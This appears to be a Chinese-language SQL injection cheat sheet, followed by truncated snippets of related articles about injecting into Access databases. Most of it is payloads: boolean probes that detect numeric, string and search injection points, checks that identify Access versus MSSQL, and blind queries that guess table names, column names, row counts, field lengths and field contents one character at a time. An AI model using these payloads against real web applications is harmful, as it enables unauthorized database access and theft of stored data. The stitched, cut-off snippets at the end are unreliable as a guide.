檢測注入型別:
1.數字型
and 1=1 //返回正常頁面
and 1=2 //返回錯誤頁面或者和1=1返回的頁面不同
2.字元型
' and 1=1 and ''=' //返回正常頁面
' and 1=2 and ''=' //返回錯誤頁面或者和1=1返回的頁面不同
3.搜尋型
%' and 1=1 and '%'='% //返回正常頁面
%' and 1=2 and '%'='% //返回錯誤頁面或者和1=1返回的頁面不同
檢測資料庫型別:
and exists (select * from sysobjects) //資料庫判斷,報錯則為access,正常顯示為mssql
and exists (select * from msysobjects) //驗證iis錯誤提示
access資料庫注射:
1.猜表
and exists (select * from [表名])
2.猜欄位
and exists (select [欄位名] from [表名])
3.猜表中的記錄數
and (select count(1) from [表名] where 1=1) between num1 and num2
4.猜欄位名長度
and (select top 1 len([欄位名1]) from (select top 1 [欄位名1],[欄位名2],...,[欄位名n] from [表名] where 1=1 order by [欄位名1],[欄位名2],...,[欄位名n]) t order by [欄位名1] desc,[欄位名2] desc,...,[欄位名n] desc ) between num1 and num2
5.猜欄位名內容
and (select top 1 asc(mid(cstr(欄位名1),1,1)) from (select top 1 [欄位名1],[欄位名2],...,[欄位名n] from [表名] where 1=1 order by [欄位名1],[欄位名2],...,[欄位名n]) t order by [欄位名1] desc,[欄位名2] desc,...,[欄位名n] desc ) between num1 and num2
ACCESS資料庫的注入
access資料庫的注入access資料庫的注入與mssql不同,要得到表名,字段,以及欄位的內容不能用mssql 暴 的方法直接得 到,access只能用猜解出表名和字段,然後再猜解出字段的長度,最後把字段的內容從第一位到第n位乙個個猜 解出來,採用的猜解方法類似玩乙個遊戲猜大小,比如乙個數字,猜...
Access資料庫注入詳解
access資料庫注入詳解 一 判斷資料庫 1.access and exists select from msysobjects 0 2.sqlserver and exists select from sysobjects 0 二 判斷資料庫中的表 and exsits select from ...
ACCESS資料庫注入詳解
asp鏈結access資料庫 driver dbq mdb uid admin pwd pass dim conn set conn server.createobject adodb.connection access注入原理 判斷注入點 and 1 1 and 1 2 0 1 判斷資料庫注入 a...